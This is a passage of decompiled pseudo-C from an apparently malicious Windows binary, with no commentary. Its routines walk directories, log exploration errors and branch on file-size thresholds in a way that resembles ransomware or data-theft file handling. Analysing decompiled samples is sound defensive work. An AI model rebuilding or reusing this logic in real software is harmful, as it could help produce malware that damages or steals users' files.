                                                                    																			}
                                                                    																			_t1480 = _t1480 - 2;
                                                                    																			_t1047 = _t1047 - 1;
                                                                    																			__eflags = _t1047;
                                                                    																			if(__eflags != 0) {
                                                                    																				continue;
                                                                    																			} else {
                                                                    																			}
                                                                    																			goto L170;
                                                                    																		}
                                                                    																		_t1483 = _v852 + _t1047 * 2 + 2;
                                                                    																		__eflags = _t1483;
                                                                    																		_v852 = _t1483;
                                                                    																	}
                                                                    																	L170:
                                                                    																	_t1048 = _v156;
                                                                    																	_v860 = _t1048;
                                                                    																	while(1) {
                                                                    																		_push( ~(0 | __eflags > 0x00000000) | (_t1048 + _t1356 + 0x00000001) * 0x00000002);
                                                                    																		_t1479 = E00EAEBCD();
                                                                    																		_t1583 = _t1583 + 4;
                                                                    																		_v856 = _t1479;
                                                                    																		__eflags = _t1479;
                                                                    																		if(__eflags != 0) {
                                                                    																			break;
                                                                    																		}
                                                                    																		_t1048 = _v156;
                                                                    																		_t1356 = _v868;
                                                                    																	}
                                                                    																	__eflags = _v152 - 8;
                                                                    																	_t1053 =  >=  ? _v172 :  &_v172;
                                                                    																	E00EA90F0(_t1479,  >=  ? _v172 :  &_v172, _v860 + _v860);
                                                                    																	E00EA90F0(_v856 + _v860 * 2,  *((intOrPtr*)(_t1530 + 0x1c)), 2 + _v868 * 2);
                                                                    																	_t1468 = _v852;
                                                                    																	_t1596 = _t1583 + 0x18;
                                                                    																	_t1060 = E00E649F0(0xf2c188, _v852);
                                                                    																	_t1509 = _v876;
                                                                    																	__eflags = _t1060;
                                                                    																	if(_t1060 != 0) {
                                                                    																		L195:
                                                                    																		E00EAEBD8(_v856);
                                                                    																		_t1583 = _t1596 + 4;
                                                                    																		goto L196;
                                                                    																	} else {
                                                                    																		__eflags =  *(_t1530 + 0x14);
                                                                    																		if( *(_t1530 + 0x14) > 0) {
                                                                    																			L176:
                                                                    																			_t1468 = _v852;
                                                                    																			_t1062 = E00E649F0(0xf2c17c, _v852);
                                                                    																			__eflags = _t1062;
                                                                    																			if(_t1062 == 0) {
                                                                    																				goto L179;
                                                                    																			} else {
                                                                    																				_t1316 = _v40 + _v40 * 2;
                                                                    																				_t1110 =  *0xf2c120; // 0x0
                                                                    																				_t1112 =  *((intOrPtr*)( *((intOrPtr*)(_t1110 + _t1316 * 4)) + 0x10));
                                                                    																				_v852 = _t1112;
                                                                    																				_v1028 = _t1112;
                                                                    																				_t998 = E00EA5E4B(_t1112);
                                                                    																				_t1577 = _t1596 + 4;
                                                                    																				__eflags = _t998;
                                                                    																				if(_t998 != 0) {
                                                                    																					goto L231;
                                                                    																				} else {
                                                                    																					_v16 = 0x2b;
                                                                    																					_t1114 =  *0xf2c0fc; // 0x0
                                                                    																					_v848 =  *((intOrPtr*)(_t1114 + (_v40 + _v40 * 2) * 4)) + 0x20;
                                                                    																					E00E59D30( &_v936, _v856);
                                                                    																					_v16 = 0x2c;
                                                                    																					E00E6F0E0(_t1286, _v848, _t1468,  &_v936);
                                                                    																					_v16 = 0x2b;
                                                                    																					_push(_v936);
                                                                    																					goto L194;
                                                                    																				}
                                                                    																			}
                                                                    																		} else {
                                                                    																			__eflags =  *((intOrPtr*)(_t1530 + 0x10)) - 0x1f400000;
                                                                    																			if( *((intOrPtr*)(_t1530 + 0x10)) <= 0x1f400000) {
                                                                    																				L179:
                                                                    																				_t1367 =  *(_t1530 + 0x14);
                                                                    																				_t1063 =  *((intOrPtr*)(_t1530 + 0x10));
                                                                    																				__eflags = _t1367;
                                                                    																				if(_t1367 != 0) {
                                                                    																					L192:
                                                                    																					_t1316 = _v40 + _v40 * 2;
                                                                    																					_t1065 =  *0xf2c120; // 0x0
                                                                    																					_t1067 =  *( *((intOrPtr*)(_t1065 + _t1316 * 4)) + 0xc);
                                                                    																					_v852 = _t1067;
                                                                    																					_v940 = _t1067;
                                                                    																					_t998 = E00EA5E4B(_t1067);
                                                                    																					_t1577 = _t1596 + 4;
                                                                    																					__eflags = _t998;
                                                                    																					if(_t998 != 0) {
                                                                    																						goto L231;
                                                                    																					} else {
                                                                    																						_v16 = 0x2d;
                                                                    																						_t1069 =  *0xf2c0fc; // 0x0
                                                                    																						_t1071 =  *((intOrPtr*)(_t1069 + (_v40 + _v40 * 2) * 4)) + 0x18;
                                                                    																						__eflags = _t1071;
                                                                    																						_v848 = _t1071;
                                                                    																						E00E59D30( &_v952, _v856);
                                                                    																						_v16 = 0x2e;
                                                                    																						E00E6F0E0(_t1286, _v848, _t1468,  &_v952);
                                                                    																						_v16 = 0x2d;
                                                                    																						_push(_v952);
                                                                    																						goto L194;
                                                                    																					}
                                                                    																				} else {
                                                                    																					__eflags = _t1063 - 0x5dc00000;
                                                                    																					if(_t1063 > 0x5dc00000) {
                                                                    																						goto L192;
                                                                    																					} else {
                                                                    																						__eflags = _t1367;
                                                                    																						if(_t1367 != 0) {
                                                                    																							L190:
                                                                    																							_t1316 = _v40 + _v40 * 2;
                                                                    																							_t1078 =  *0xf2c120; // 0x0
                                                                    																							_t1080 =  *( *((intOrPtr*)(_t1078 + _t1316 * 4)) + 8);
                                                                    																							_v852 = _t1080;
                                                                    																							_v944 = _t1080;
                                                                    																							_t998 = E00EA5E4B(_t1080);
                                                                    																							_t1577 = _t1596 + 4;
                                                                    																							__eflags = _t998;
                                                                    																							if(_t998 != 0) {
                                                                    																								goto L231;
                                                                    																							} else {
                                                                    																								_v16 = 0x2f;
                                                                    																								_t1082 =  *0xf2c0fc; // 0x0
                                                                    																								_v848 =  *((intOrPtr*)(_t1082 + (_v40 + _v40 * 2) * 4)) + 0x10;
                                                                    																								E00E59D30( &_v956, _v856);
                                                                    																								_v16 = 0x30;
                                                                    																								E00E6F0E0(_t1286, _v848, _t1468,  &_v956);
                                                                    																								_v16 = 0x2f;
                                                                    																								_push(_v956);
                                                                    																								goto L194;
                                                                    																							}
                                                                    																						} else {
                                                                    																							__eflags = _t1063 - 0x25800000;
                                                                    																							if(_t1063 > 0x25800000) {
                                                                    																								goto L190;
                                                                    																							} else {
                                                                    																								__eflags = _t1367;
                                                                    																								if(__eflags > 0) {
                                                                    																									L188:
                                                                    																									_t1316 = _v40 + _v40 * 2;
                                                                    																									_t1089 =  *0xf2c120; // 0x0
                                                                    																									_t1091 =  *( *((intOrPtr*)(_t1089 + _t1316 * 4)) + 4);
                                                                    																									_v852 = _t1091;
                                                                    																									_v992 = _t1091;
                                                                    																									_t998 = E00EA5E4B(_t1091);
                                                                    																									_t1577 = _t1596 + 4;
                                                                    																									__eflags = _t998;
                                                                    																									if(_t998 != 0) {
                                                                    																										goto L231;
                                                                    																									} else {
                                                                    																										_v16 = 0x33;
                                                                    																										_t1093 =  *0xf2c0fc; // 0x0
                                                                    																										_v848 =  *((intOrPtr*)(_t1093 + (_v40 + _v40 * 2) * 4)) + 8;
                                                                    																										E00E59D30( &_v964, _v856);
                                                                    																										_v16 = 0x34;
                                                                    																										E00E6F0E0(_t1286, _v848, _t1468,  &_v964);
                                                                    																										_v16 = 0x33;
                                                                    																										_push(_v964);
                                                                    																										goto L194;
                                                                    																									}
                                                                    																								} else {
                                                                    																									if(__eflags < 0) {
                                                                    																										L186:
                                                                    																										_t1316 = _v40 + _v40 * 2;
                                                                    																										_t1100 =  *0xf2c120; // 0x0
                                                                    																										_t1102 =  *((intOrPtr*)( *((intOrPtr*)(_t1100 + _t1316 * 4))));
                                                                    																										_v852 = _t1102;
                                                                    																										_v1024 = _t1102;
                                                                    																										_t998 = E00EA5E4B(_t1102);
                                                                    																										_t1577 = _t1596 + 4;
                                                                    																										__eflags = _t998;
                                                                    																										if(_t998 != 0) {
                                                                    																											goto L231;
                                                                    																										} else {
                                                                    																											_v16 = 0x31;
                                                                    																											_t1104 =  *0xf2c0fc; // 0x0
                                                                    																											_v848 =  *((intOrPtr*)(_t1104 + (_v40 + _v40 * 2) * 4));
                                                                    																											E00E59D30( &_v960, _v856);
                                                                    																											_v16 = 0x32;
                                                                    																											E00E6F0E0(_t1286, _v848, _t1468,  &_v960);
                                                                    																											_v16 = 0x31;
                                                                    																											_push(_v960);
                                                                    																											L194:
                                                                    																											E00EAEBD8();
                                                                    																											_v16 = 0x21;
                                                                    																											E00EA5E5C(_v852);
                                                                    																											_t1596 = _t1577 + 8;
                                                                    																											goto L195;
                                                                    																										}
                                                                    																									} else {
                                                                    																										__eflags = _t1063 - 0xa00000;
                                                                    																										if(_t1063 >= 0xa00000) {
                                                                    																											goto L188;
                                                                    																										} else {
                                                                    																											goto L186;
                                                                    																										}
                                                                    																									}
                                                                    																								}
                                                                    																							}
                                                                    																						}
                                                                    																					}
                                                                    																				}
                                                                    																			} else {
                                                                    																				goto L176;
                                                                    																			}
                                                                    																		}
                                                                    																	}
                                                                    																}
                                                                    															}
                                                                    														}
                                                                    													}
                                                                    												}
                                                                    											}
                                                                    										}
                                                                    										goto L258;
                                                                    										L196:
                                                                    										_t1530 =  *_t1530;
                                                                    										__eflags = _t1530 - _t1509;
                                                                    									} while (_t1530 != _t1509);
                                                                    									goto L197;
                                                                    								}
                                                                    							} else {
                                                                    								_push("\\");
                                                                    								_t1136 = E00E73CB0(_t1286,  &_v252, _t1286 + 8, _t1503);
                                                                    								_t1583 = _t1583 + 4;
                                                                    								_v16 = 0x22;
                                                                    								if( *((intOrPtr*)(_t1136 + 0x14)) >= 8) {
                                                                    									_t1136 =  *_t1136;
                                                                    								}
                                                                    								E00E86F30(_t1136, _t1529);
                                                                    								_v16 = 0x21;
                                                                    								E00E59AF0(_t1286,  &_v252, _t1503);
                                                                    								_t1140 =  >=  ? _v172 :  &_v172;
                                                                    								if(FindFirstFileW( >=  ? _v172 :  &_v172,  &_v844) != 0xffffffff) {
                                                                    									goto L153;
                                                                    								} else {
                                                                    									_push(_t1286 + 8);
                                                                    									_t1143 = E00E73EF0(_t1286,  &_v1076, L"error at exploreing ");
                                                                    									_t1599 = _t1583 + 4;
                                                                    									_v16 = 0x23;
                                                                    									if( *((intOrPtr*)(_t1143 + 0x14)) >= 8) {
                                                                    										_t1143 =  *_t1143;
                                                                    									}
                                                                    									E00E59EB0(_t1286, _t1143, 1, _t1503, _t1529);
                                                                    									_v16 = 0x21;
                                                                    									E00E59AF0(_t1286,  &_v1076, _t1503);
                                                                    									_v16 = 0x20;
                                                                    									_t1543 = _v52;
                                                                    									if(_t1543 != 0) {
                                                                    										_t1503 = _v48;
                                                                    										if(_t1543 != _t1503) {
                                                                    											do {
                                                                    												E00EAEBD8( *((intOrPtr*)(_t1543 + 0x14)));
                                                                    												_t1543 = _t1543 + 0x18;
                                                                    												_t1599 = _t1599 + 4;
                                                                    											} while (_t1543 != _t1503);
                                                                    											_t1543 = _v52;
                                                                    										}
                                                                    										E00E733D0(_t1286, _t1503, _t1543, (_v44 - _t1543 >> 3) * 0xaaaaaaab);
                                                                    										_v52 = 0;
                                                                    										_v48 = 0;
                                                                    										_v44 = 0;
                                                                    									}
                                                                    									_v16 = 0x1f;
                                                                    									E00E6EB90( &_v60);
                                                                    									_v16 = 0x14;
                                                                    									E00E59AF0(_t1286,  &_v172, _t1503);
                                                                    									L120:
                                                                    									_v16 = 0;
                                                                    									E00E59AF0(_t1286,  &_v112, _t1503);
                                                                    									_v16 = 0xffffffff;
                                                                    									E00E59AF0(_t1286, _t1286 + 8, _t1503);
                                                                    									 *[fs:0x0] = _v24;
                                                                    									return E00EA7663(_v32 ^ _t1569);
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					} else {
                                                                    						asm("xorps xmm0, xmm0");
                                                                    						_v80 = 0;
                                                                    						asm("movq [ebp-0x4c], xmm0");
                                                                    						_v88 = 0;
                                                                    						_v84 = 0;
                                                                    						_v80 = 0;
                                                                    						_v16 = 2;
                                                                    						asm("movq [ebp-0x7c], xmm0");
                                                                    						_v128 = 0;
                                                                    						_v132 = 0;
                                                                    						_v136 = 0;
                                                                    						_v852 = 0;
                                                                    						_v128 = 0;
                                                                    						_v16 = 3;
                                                                    						asm("movq [ebp-0x88], xmm0");
                                                                    						_v140 = 0;
                                                                    						_v144 = 0;
                                                                    						_v148 = 0;
                                                                    						_v856 = 0;
                                                                    						_v140 = 0;
                                                                    						_v16 = 4;
                                                                    						asm("movq [ebp-0x40], xmm0");
                                                                    						_v68 = 0;
                                                                    						_v76 = 0;
                                                                    						_v72 = 0;
                                                                    						_v68 = 0;
                                                                    						_v16 = 5;
                                                                    						_v868 = 6;
                                                                    						asm("o16 nop [eax+eax]");
                                                                    						do {
                                                                    							_push(0xc);
                                                                    							_v932 = 0;
                                                                    							_v928 = 0;
                                                                    							_t1518 = E00EA76B3(_t1286, _t1459, _t1502, _t1528, _t1627);
                                                                    							_t1605 = _t1577 + 4;
                                                                    							_v932 = _t1518;
                                                                    							 *_t1518 = _t1518;
                                                                    							 *(_t1518 + 4) = _t1518;
                                                                    							_v16 = 6;
                                                                    							_t1549 = _v84;
                                                                    							_t1628 = _t1549 - _v80;
                                                                    							if(_t1549 == _v80) {
                                                                    								_push( &_v932);
                                                                    								E00E763D0( &_v88, _t1549);
                                                                    								_t1500 = _v932;
                                                                    							} else {
                                                                    								_push(0xc);
                                                                    								 *_t1549 = 0;
                                                                    								_t1549[1] = 0;
                                                                    								_t1500 = E00EA76B3(_t1286, _t1459, _t1518, _t1549, _t1628);
                                                                    								_t1605 = _t1605 + 4;
                                                                    								_v932 = _t1500;
                                                                    								 *_t1500 = _t1500;
                                                                    								 *(_t1500 + 4) = _t1500;
                                                                    								 *_t1549 = _t1518;
                                                                    								_t1549[1] = 0;
                                                                    								_v84 = _v84 + 8;
                                                                    								_v928 = _t1549[1];
                                                                    							}
                                                                    							_v860 = _t1500;
                                                                    							_v16 = 5;
                                                                    							 *( *(_t1500 + 4)) = 0;
                                                                    							_t1519 =  *_t1500;
                                                                    							if(_t1519 != 0) {
                                                                    								do {
                                                                    									_t1549 =  *_t1519;
                                                                    									E00EAEBD8(_t1519[2]);
                                                                    									_push(0xc);
                                                                    									E00EA7674(_t1519);
                                                                    									_t1605 = _t1605 + 0xc;
                                                                    									_t1519 = _t1549;
                                                                    									_t1630 = _t1549;
                                                                    								} while (_t1549 != 0);
                                                                    								_t1500 = _v860;
                                                                    							}
                                                                    							E00EA7674(_t1500);
                                                                    							_v908 = 0;
                                                                    							_v904 = 0;
                                                                    							_t1520 = E00EA76B3(_t1286, _t1500, _t1519, _t1549, _t1630, 0xc, 0xc);
                                                                    							_t1606 = _t1605 + 0xc;
                                                                    							_v908 = _t1520;
                                                                    							 *_t1520 = _t1520;
                                                                    							 *(_t1520 + 4) = _t1520;
                                                                    							_v16 = 7;
                                                                    							_t1550 = _v72;
                                                                    							_t1631 = _t1550 - _v68;
                                                                    							if(_t1550 == _v68) {
                                                                    								_push( &_v908);
                                                                    								_t1426 =  &_v76;
                                                                    								E00E763D0( &_v76, _t1550);
                                                                    								_t1459 = _v908;
                                                                    							} else {
                                                                    								_push(0xc);
                                                                    								 *_t1550 = 0;
                                                                    								_t1550[1] = 0;
                                                                    								_t1459 = E00EA76B3(_t1286, _t1500, _t1520, _t1550, _t1631);
                                                                    								_t1606 = _t1606 + 4;
                                                                    								_v908 = _t1459;
                                                                    								 *_t1459 = _t1459;
                                                                    								 *(_t1459 + 4) = _t1459;
                                                                    								_t1426 = _t1550[1];
                                                                    								 *_t1550 = _t1520;
                                                                    								_t1550[1] = 0;
                                                                    								_v72 = _v72 + 8;
                                                                    								_v904 = _t1550[1];
                                                                    							}
                                                                    							_v860 = _t1459;
                                                                    							_v16 = 5;
                                                                    							 *( *(_t1459 + 4)) = 0;
                                                                    							_t1521 =  *_t1459;
                                                                    							if(_t1521 != 0) {
                                                                    								do {
                                                                    									_t1550 =  *_t1521;
                                                                    									E00EAEBD8(_t1521[2]);
                                                                    									_push(0xc);
                                                                    									E00EA7674(_t1521);
                                                                    									_t1606 = _t1606 + 0xc;
                                                                    									_t1521 = _t1550;
                                                                    									_t1633 = _t1550;
                                                                    								} while (_t1550 != 0);
                                                                    								_t1459 = _v860;
                                                                    							}
                                                                    							E00EA7674(_t1459);
                                                                    							_t1551 = E00EA76B3(_t1286, _t1459, _t1521, _t1550, _t1633, 0x30, 0xc);
                                                                    							_v888 = _t1551;
                                                                    							E00EA5E2A(_t1426, _t1633, _t1551, 2);
                                                                    							_t1608 = _t1606 + 0x14;
                                                                    							_v16 = 5;
                                                                    							_t1522 = _v852;
                                                                    							_v860 = _t1551;
                                                                    							_t1634 = _t1522 - _v128;
                                                                    							if(_t1522 == _v128) {
                                                                    								_push( &_v860);
                                                                    								_t1316 =  &_v136;
                                                                    								E00E76050(_t1316, _t1522);
                                                                    								_t1502 = _v132;
                                                                    							} else {
                                                                    								 *_t1522 = _t1551;
                                                                    								_t1502 = _t1522 + 4;
                                                                    								_v132 = _t1502;
                                                                    							}
                                                                    							_push(0x30);
                                                                    							_v852 = _t1502;
                                                                    							_t1552 = E00EA76B3(_t1286, _t1459, _t1502, _t1551, _t1634);
                                                                    							_v892 = _t1552;
                                                                    							E00EA5E2A(_t1316, _t1634, _t1552, 2);
                                                                    							_t1577 = _t1608 + 0xc;
                                                                    							_v16 = 5;
                                                                    							_v860 = _t1552;
                                                                    							_t1528 = _v856;
                                                                    							if(_t1528 == _v140) {
                                                                    								_push( &_v860);
                                                                    								_t1316 =  &_v148;
                                                                    								E00E76050(_t1316, _t1528);
                                                                    								_v856 = _v144;
                                                                    							} else {
                                                                    								 *_t1528 = _v892;
                                                                    								_t1528 = _t1528 + 4;
                                                                    								_v856 = _t1528;
                                                                    								_v144 = _t1528;
                                                                    							}
                                                                    							_t116 =  &_v868;
                                                                    							 *_t116 = _v868 - 1;
                                                                    						} while ( *_t116 != 0);
                                                                    						_t998 = E00EA5E4B(0xf2c144);
                                                                    						_t1577 = _t1577 + 4;
                                                                    						if(_t998 != 0) {
                                                                    							goto L231;
                                                                    						} else {
                                                                    							_t1208 =  *0xf2c100; // 0x0
                                                                    							_v868 = _t1208;
                                                                    							_t1638 = _t1208 -  *0xf2c104; // 0x0
                                                                    							if(_t1638 == 0) {
                                                                    								_push( &_v88);
                                                                    								E00E765C0(_t1286, 0xf2c0fc, _t1502, _t1528, _t1208);
                                                                    							} else {
                                                                    								 *_t1208 = 0;
                                                                    								_t1208[1] = 0;
                                                                    								_t1208[2] = 0;
                                                                    								_t1266 = _v88;
                                                                    								_t1452 = _v84;
                                                                    								_v860 = _t1266;
                                                                    								_v892 = _t1452;
                                                                    								if(_t1266 != _t1452) {
                                                                    									_t1564 = _t1452 - _t1266 >> 3;
                                                                    									_push(_t1564);
                                                                    									_t1267 = E00E734F0(_t1286, _t1459, _t1502, _t1564);
                                                                    									_t1453 = _v868;
                                                                    									_v884 = _t1453;
                                                                    									 *_t1453 = _t1267;
                                                                    									 *((intOrPtr*)(_t1453 + 4)) = _t1267;
                                                                    									 *((intOrPtr*)(_t1453 + 8)) = _t1267 + _t1564 * 8;
                                                                    									_v16 = 0xa;
                                                                    									_t1459 = _v892;
                                                                    									_t1269 = E00E76F60(_t1286, _v860, _v892, _t1502, _t1564,  *_t1453, _t1453);
                                                                    									_t1577 = _t1577 + 8;
                                                                    									_v884 = 0;
                                                                    									 *((intOrPtr*)(_v868 + 4)) = _t1269;
                                                                    									_v16 = 5;
                                                                    								}
                                                                    								 *0xf2c100 =  &(( *0xf2c100)[3]);
                                                                    							}
                                                                    							_t1553 =  *0xf2c124; // 0x0
                                                                    							_v884 = _t1553;
                                                                    							_t1641 = _t1553 -  *0xf2c128; // 0x0
                                                                    							if(_t1641 == 0) {
                                                                    								_push( &_v136);
                                                                    								E00E76230(_t1286, 0xf2c120, _t1502, _t1553);
                                                                    							} else {
                                                                    								_t1260 = _v136;
                                                                    								 *_t1553 = 0;
                                                                    								_t1553[1] = 0;
                                                                    								_t1553[2] = 0;
                                                                    								if(_t1260 != _t1502) {
                                                                    									_t1527 = _t1502 - _t1260;
                                                                    									_v852 = _t1527;
                                                                    									_t1502 = _t1527 >> 2;
                                                                    									_t1261 = E00E738A0(_t1286, _t1459, _t1502, _t1553, _t1502);
                                                                    									 *_t1553 = _t1261;
                                                                    									_t1553[1] = _t1261;
                                                                    									_v872 = _t1553;
                                                                    									_t1553[2] = _t1261 + _t1502 * 4;
                                                                    									_v16 = 0xb;
                                                                    									_t1561 =  *_t1553;
                                                                    									E00EA90F0(_t1561, _v136, _v852);
                                                                    									_t1577 = _t1577 + 0xc;
                                                                    									_v872 = 0;
                                                                    									 *((intOrPtr*)(_v884 + 4)) = _t1561 + _t1502 * 4;
                                                                    									_v16 = 5;
                                                                    								}
                                                                    								 *0xf2c124 =  &(( *0xf2c124)[3]);
                                                                    							}
                                                                    							_t1554 =  *0xf2c130; // 0x0
                                                                    							_v872 = _t1554;
                                                                    							_t1644 = _t1554 -  *0xf2c134; // 0x0
                                                                    							if(_t1644 == 0) {
                                                                    								_push( &_v148);
                                                                    								E00E76230(_t1286, 0xf2c12c, _t1502, _t1554);
                                                                    							} else {
                                                                    								_t1449 = _v148;
                                                                    								_t1253 = _v856;
                                                                    								 *_t1554 = 0;
                                                                    								 *(_t1554 + 4) = 0;
                                                                    								 *(_t1554 + 8) = 0;
                                                                    								if(_t1449 != _t1253) {
                                                                    									_t1254 = _t1253 - _t1449;
                                                                    									_v856 = _t1254;
                                                                    									_t1526 = _t1254 >> 2;
                                                                    									_t1255 = E00E738A0(_t1286, _t1459, _t1526, _t1554, _t1526);
                                                                    									 *_t1554 = _t1255;
                                                                    									 *(_t1554 + 4) = _t1255;
                                                                    									_v876 = _t1554;
                                                                    									 *(_t1554 + 8) = _t1255 + _t1526 * 4;
                                                                    									_v16 = 0xc;
                                                                    									_t1554 =  *_t1554;
                                                                    									E00EA90F0(_t1554, _v148, _v856);
                                                                    									_t1577 = _t1577 + 0xc;
                                                                    									_v876 = 0;
                                                                    									 *((intOrPtr*)(_v872 + 4)) = _t1554 + _t1526 * 4;
                                                                    									_v16 = 5;
                                                                    								}
                                                                    								 *0xf2c130 =  *0xf2c130 + 0xc;
                                                                    							}
                                                                    							_t1523 =  *0xf2c10c; // 0x0
                                                                    							_t1647 = _t1523 -  *0xf2c110; // 0x0
                                                                    							if(_t1647 == 0) {
                                                                    								_push( &_v76);
                                                                    								E00E765C0(_t1286, 0xf2c108, _t1523, _t1554, _t1523);
                                                                    							} else {
                                                                    								 *_t1523 = 0;
                                                                    								 *(_t1523 + 4) = 0;
                                                                    								 *(_t1523 + 8) = 0;
                                                                    								_t1249 = _v76;
                                                                    								_t1447 = _v72;
                                                                    								_v872 = _t1249;
                                                                    								_v876 = _t1447;
                                                                    								if(_t1249 != _t1447) {
                                                                    									_t1554 = _t1447 - _t1249 >> 3;
                                                                    									_push(_t1554);
                                                                    									_t1250 = E00E734F0(_t1286, _t1459, _t1523, _t1554);
                                                                    									 *_t1523 = _t1250;
                                                                    									 *(_t1523 + 4) = _t1250;
                                                                    									_v848 = _t1523;
                                                                    									 *(_t1523 + 8) = _t1250 + _t1554 * 8;
                                                                    									_v16 = 0xd;
                                                                    									_t1459 = _v876;
                                                                    									_t1252 = E00E76F60(_t1286, _v872, _v876, _t1523, _t1554,  *_t1523, _t1523);
                                                                    									_t1577 = _t1577 + 8;
                                                                    									 *(_t1523 + 4) = _t1252;
                                                                    									_v848 = 0;
                                                                    									_v16 = 5;
                                                                    								}
                                                                    								 *0xf2c10c =  *0xf2c10c + 0xc;
                                                                    							}
                                                                    							_t1650 =  *0xf29370;
                                                                    							if( *0xf29370 != 0) {
                                                                    								_push(0xc);
                                                                    								_v916 = 0;
                                                                    								_v912 = 0;
                                                                    								_t1524 = E00EA76B3(_t1286, _t1459, _t1523, _t1554, _t1650);
                                                                    								_t1613 = _t1577 + 4;
                                                                    								_v916 = _t1524;
                                                                    								 *_t1524 = _t1524;
                                                                    								 *(_t1524 + 4) = _t1524;
                                                                    								_v16 = 0xe;
                                                                    								_t1556 =  *0xf2c118; // 0x0
                                                                    								_t1651 = _t1556 -  *0xf2c11c; // 0x0
                                                                    								if(_t1651 == 0) {
                                                                    									_push( &_v916);
                                                                    									E00E763D0(0xf2c114, _t1556);
                                                                    								} else {
                                                                    									_push(0xc);
                                                                    									 *_t1556 = 0;
                                                                    									_t1556[1] = 0;
                                                                    									_t1247 = E00EA76B3(_t1286, _t1459, _t1524, _t1556, _t1651);
                                                                    									_v916 = _t1247;
                                                                    									_t1613 = _t1613 + 4;
                                                                    									 *_t1247 = _t1247;
                                                                    									 *(_t1247 + 4) = _t1247;
                                                                    									 *_t1556 = _t1524;
                                                                    									_t1556[1] = 0;
                                                                    									 *0xf2c118 =  &(( *0xf2c118)[2]);
                                                                    									_v912 = _t1556[1];
                                                                    								}
                                                                    								_v16 = 5;
                                                                    								E00E6F060( &_v916);
                                                                    								_push(0xc);
                                                                    								_v924 = 0;
                                                                    								_v920 = 0;
                                                                    								_t1523 = E00EA76B3(_t1286, _t1459, _t1524, _t1556, _t1651);
                                                                    								_t1614 = _t1613 + 4;
                                                                    								_v924 = _t1523;
                                                                    								 *_t1523 = _t1523;
                                                                    								 *(_t1523 + 4) = _t1523;
                                                                    								_v16 = 0xf;
                                                                    								_t1557 =  *0xf2c118; // 0x0
                                                                    								_t1652 = _t1557 -  *0xf2c11c; // 0x0
                                                                    								if(_t1652 == 0) {
                                                                    									_push( &_v924);
                                                                    									E00E763D0(0xf2c114, _t1557);
                                                                    								} else {
                                                                    									_push(0xc);
                                                                    									 *_t1557 = 0;
                                                                    									_t1557[1] = 0;
                                                                    									_t1245 = E00EA76B3(_t1286, _t1459, _t1523, _t1557, _t1652);
                                                                    									_v924 = _t1245;
                                                                    									_t1614 = _t1614 + 4;
                                                                    									 *_t1245 = _t1245;
                                                                    									 *(_t1245 + 4) = _t1245;
                                                                    									 *_t1557 = _t1523;
                                                                    									_t1557[1] = 0;
                                                                    									 *0xf2c118 =  &(( *0xf2c118)[2]);
                                                                    									_v920 = _t1557[1];
                                                                    								}
                                                                    								_v16 = 5;
                                                                    								_t1443 =  &_v924;
                                                                    								E00E6F060( &_v924);
                                                                    								_push(0x30);
                                                                    								_t1558 = E00EA76B3(_t1286, _t1459, _t1523, _t1557, _t1652);
                                                                    								_v888 = _t1558;
                                                                    								E00EA5E2A( &_v924, _t1652, _t1558, 2);
                                                                    								_t1616 = _t1614 + 0xc;
                                                                    								_v16 = 5;
                                                                    								_t1239 =  *0xf2c13c; // 0x0
                                                                    								_v848 = _t1558;
                                                                    								_t1653 = _t1239 -  *0xf2c140; // 0x0
                                                                    								if(_t1653 == 0) {
                                                                    									_push( &_v848);
                                                                    									_t1443 = 0xf2c138;
                                                                    									E00E76050(0xf2c138, _t1239);
                                                                    								} else {
                                                                    									 *_t1239 = _t1558;
                                                                    									 *0xf2c13c =  &(( *0xf2c13c)[1]);
                                                                    								}
                                                                    								_push(0x30);
                                                                    								_t1554 = E00EA76B3(_t1286, _t1459, _t1523, _t1558, _t1653);
                                                                    								_v888 = _t1554;
                                                                    								E00EA5E2A(_t1443, _t1653, _t1554, 2);
                                                                    								_t1577 = _t1616 + 0xc;
                                                                    								_v16 = 5;
                                                                    								_t1243 =  *0xf2c13c; // 0x0
                                                                    								_v848 = _t1554;
                                                                    								_t1654 = _t1243 -  *0xf2c140; // 0x0
                                                                    								if(_t1654 == 0) {
                                                                    									_push( &_v848);
                                                                    									E00E76050(0xf2c138, _t1243);
                                                                    								} else {
                                                                    									 *_t1243 = _t1554;
                                                                    									 *0xf2c13c =  &(( *0xf2c13c)[1]);
                                                                    								}
                                                                    								 *0xf29370 = 0;
                                                                    							}
                                                                    							_v972 = 0;
                                                                    							_v968 = 0;
                                                                    							_t1216 = E00EA76B3(_t1286, _t1459, _t1523, _t1554, _t1654);
                                                                    							_v972 = _t1216;
                                                                    							 *_t1216 = _t1216;
                                                                    							 *(_t1216 + 4) = _t1216;
                                                                    							_v16 = 0x12;
                                                                    							E00E714A0(_t1286, _t1459,  &_v972);
                                                                    							_v16 = 5;
                                                                    							E00E6F060( &_v972);
                                                                    							_t1555 = E00EA76B3(_t1286, _t1459, _t1523, _t1554, _t1654, 0x30, 0xc);
                                                                    							_v888 = _t1555;
                                                                    							E00EA5E2A( &_v972, _t1654, _t1555, 2);
                                                                    							_t1612 = _t1577 + 0x10;
                                                                    							_v16 = 5;
                                                                    							_t1222 =  *0xf2c13c; // 0x0
                                                                    							_v848 = _t1555;
                                                                    							_t1655 = _t1222 -  *0xf2c140; // 0x0
                                                                    							if(_t1655 == 0) {
                                                                    								_t1459 =  &_v848;
                                                                    								_push( &_v848);
                                                                    								E00E76050(0xf2c138, _t1222);
                                                                    							} else {
                                                                    								 *_t1222 = _t1555;
                                                                    								 *0xf2c13c =  &(( *0xf2c13c)[1]);
                                                                    							}
                                                                    							asm("lock inc dword [0xf2c0a4]");
                                                                    							E00EA5E5C(0xf2c144);
                                                                    							_t1577 = _t1612 + 4;
                                                                    							_v16 = 4;
                                                                    							E00E72AF0( &_v76, _t1459);
                                                                    							_v16 = 3;
                                                                    							E00E6E870(_t1286,  &_v148, _t1523);
                                                                    							_v16 = 2;
                                                                    							E00E6E870(_t1286,  &_v136, _t1523);
                                                                    							_v16 = 0;
                                                                    							E00E72AF0( &_v88, _t1459);
                                                                    							goto L68;
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    					do {
                                                                    						Sleep(0x3e8);
                                                                    						_t1502 = _t1502 + 1;
                                                                    						if(_t1502 <= 0x258) {
                                                                    							goto L7;
                                                                    						} else {
                                                                    							_v16 = 1;
                                                                    							_t11 = _t1286 + 0x18; // 0xec7276
                                                                    							_t1316 =  *_t11;
                                                                    							if(0x7ffffffe - _t1316 < 0x15) {
                                                                    								L230:
                                                                    								_t998 = E00E59480(_t1316);
